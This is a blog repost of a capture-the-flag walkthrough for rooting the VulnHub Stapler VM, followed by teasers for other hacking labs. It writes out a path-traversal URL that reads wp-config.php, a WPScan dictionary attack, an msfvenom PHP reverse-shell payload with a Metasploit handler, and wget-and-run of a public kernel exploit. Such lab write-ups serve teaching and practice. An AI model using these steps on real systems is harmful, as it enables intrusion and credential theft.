Chuyển đến nội dung chính

Hack the Stapler VM (CTF Challenge)

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is to reconnaissance, enumeration, and exploits this vulnerable machine to get root access and to read the contents of flag.txt. We have been told that are various methods to do so but we have tried and found the simplest way.
Download the stapler vm from here
WalkThrough
 Start off with scanning the network to find our target. And we all the command for it is:
netdiscover
We found our target –> 192.168.1.105
To scan our target we will use Sparta. Sparta is combination of nmap scanning and Nikto. It makes our work simpler. To open Sparta, Open kali linux > Applications > Information Gathering > Sparta. After opening Sparta, click on where it says “click here to add host to scope”.  A dialog box will open asking target’s IP. Give your target’ IP there and click on add scope.
Once Sparta starts working, it will show you all the ports open on our target.

Result shows us that port number 21, 22, 53, 80, 137, 139, 666, 3306, 12380 are open.  The Nikto tab in Sparta of port number 80 shows us that we can open our target IP in browser also it provides us with the information that /.bashrc and /.profile are the files which may contain useful information.
Firstly, we will open our target IP in the browser to see if we find anything.

As you can see that we do not find anything upon opening the target IP in the browser.  So, then we tried to open the two files which we found with the help of Nikto.  When we open that file it asks us to download a file. No harm in that. So we downloaded the file.
We regretted doing so as there was nothing in both of these files. It was useless to do so. So we explored more of Nikto has to provide and found out that we could exploit port number 21 which has FTP service. Nikto took the liberty of using hydra and finding the username and password of ftp which is ftp and password respectively.
Now that we had username and password, so, we tried to exploit it through the terminal of kali by typing :
ftp 192.168.1.105
ftp (username)
password (password)

And again we found nothing in it. Similarly, we tried to exploit port numbers 22, 139 and 666 respectively. Alas! We found nothing. Again!
So we decided to explore Nikto more and we found that there was a robots.txt file on the port number 12380 with two entries. We also noticed that the site had SSL security which meant it will only open with prefix https://
So firstly we tried opening it in browser with port 12380.

Finally, something happened! The site opened on the port 12380. Then we tried to open robots.txt (https://192.168.1.105/robots.txt) and we found two entries i.e. /admin112233/ and /blogblog/
We opened them one by one only /blogblog/ proved to be useful as a blog opened in it.

Studying this blog we have established that the blog is made off Word Press. Now obviously use WPScan to know all about the blog. To apply wpscan we have come up with a 3-in-1 command as it will tell us all about the theme and plug-ins as well as usernames and the command is:
wpscan –url https://192.168.1.105/blogblog/ –enumerate ap –enumerate at –enumerate u
The wpscan has also informed us about the upload directory as we have highlighted in the above image.


Completing the scan and we found one plug-in i.e. advanced video plug-in and we searched for its exploit on www.exploit-db.com and found one exploit for it
Traversing the exploit we found the correct command to execute and use it to our advantage and the command is:
http://127.0.0.1/wordpress/wpadmin/adminajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILE PATH]

We formatted the command as per our usage
https://192.168.1.105:12380/blogblog/wpadmin/adminajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

When our formatted URL will be executed, it will show us an error. Also, if you will pay attention there will be some changes on the WordPress blog.

It gives us an image. We already know where is upload directory (from WPScan) so we can directly go there to view/download the image. And for this our URL will be:
https://192.168.1.105/blogblog/wp-content
Now if we try to open this image or download it then it will show us an error as same as shown below:
The trick here is to download the image file without any extension. Run the following command to read the image:
cat 1439829871

This provides us with the username and password of MYSQL. To enter the MYSQL database we will use third-party tool called HeidiSQL_9.3_Portable.  
Open the tool; give target IP in hostname, username in user and password in password. Then click on OK.
Clicking on OK we will enter the database.

Click on wp _users to see the usernames and passwords of all the users.

As you can see that all the passwords are encrypted. So now we will apply dictionary attack using WPScan to the first username that we had found which was john with the help of rockyou.txt. The command to do so is:
wpscan –url hhtps://192.168.1.105/blogblog –wordlist /usr/share/wordlist/rockyou.txt –username john
Once the attack is completed we will have the password for username john i.e. incorrect.

Now we will logon using the said username and password.

As we have logged in, all now we have to do is to create our PHP code to upload so that once the code will execute we will have its session. To generate the code type:
msfvenom -p php/meterpreter/reverse_tecp lhost-192.168.1.105 lport=4444 -f raw
Copy the code from <?php to die() and save it in a file with .php extension.
Now, as we already logged on, go to plugins option then select add plugin option. Click on browse option and select the PHP in which you have just saved the code and click on OK.
Now go to the upload directory and double click on the you just uploaded.

Simultaneously, open metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit
Executing the above exploit we will have a meterpreter’s session. Further type:
shell
And then type the combination of two following commands to import and running the python file to reach the terminal:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
 Now, we will check the Ubuntu version so that we can find its exploit and so type:
lsb_release a
 Now with the following command we will find a writable folder:
 find / -writable -type d 2>/dev/null

We now know that our target is using Ubuntu 16.04 so we will try and search its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below:
We already now know that this exploit is not available in metasploit so we will copy its code to download it as shown:

Now, we need to go into the desired writable file and for that type :
cd /tmp
And then to download the exploit type:
Wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

When we download the exploit, zip files are downloaded and now unzip it and for that type:
unzip 39772.zip

Open the unzipped file by typing:
ls
cd 39772
Now we have a tar file named exploit.tar. Open it with the following command:
tar -xvf exploit.tar

Now use the ls command to view the directories. Now we will go into the double put-exploit folder and for that type:
cd ebpf_mapfd_doubleput_exploit
ls (list the directories)
./compile.sh (will run the compile.sh)
./doubleput (will run the double.sh)
whoami (will tell you where you have reached)
cd /root (will take you into /root)
ls (shows you the directories of /root)
cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
Nhãn:

Bài đăng phổ biến từ blog này

Tổng Hợp Về Tấn công XSS và Bypass

1-        XSS là gì ?        XSS(  Cross-Site Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra. 2-        Nguyên lý hoạt động XSS        Khi website đã bị chèn các thẻ html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến server  nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy victim tùy vào mệnh lệnh của hacker 3-        Phân loại XSS XSS Có 2 dạng, đó là:      +       Persistent +      Non-Pe
Đọc thêm

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Today we are going to perform penetration testing with part II of previous lab, download it from  here . Now install the iso image in VM ware and start it. In this lab task level is intermediate and challenge is to gain access of administration console and then upload a PHP webshell. Start Kali Linux then open the terminal and  type netdiscover  command for scanning network. Here  192.168.1.102  is my target IP which is shown in the screenshot. Now explore this IP in browser. When you will open target IP in browser you will get a web page having heading My Awesome Photoblog . On the top of left side it contains some tags: home; test; ruxcon; 2010; all pictures; admin. Now  Click  on  test . The given URL : http://192.168.1.102/cat.php?id=1  will run sql query for  ID 1  now let try to find out whether the above URL is vulnerable to sql injection or not by adding( ‘) apostrophe at last of URL: http://192.168.1.102/cat.php?id=1 ’ as it is not vulnerable. I didn’t get any error messa
Đọc thêm

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC Exploit 4.4 Share this:
Đọc thêm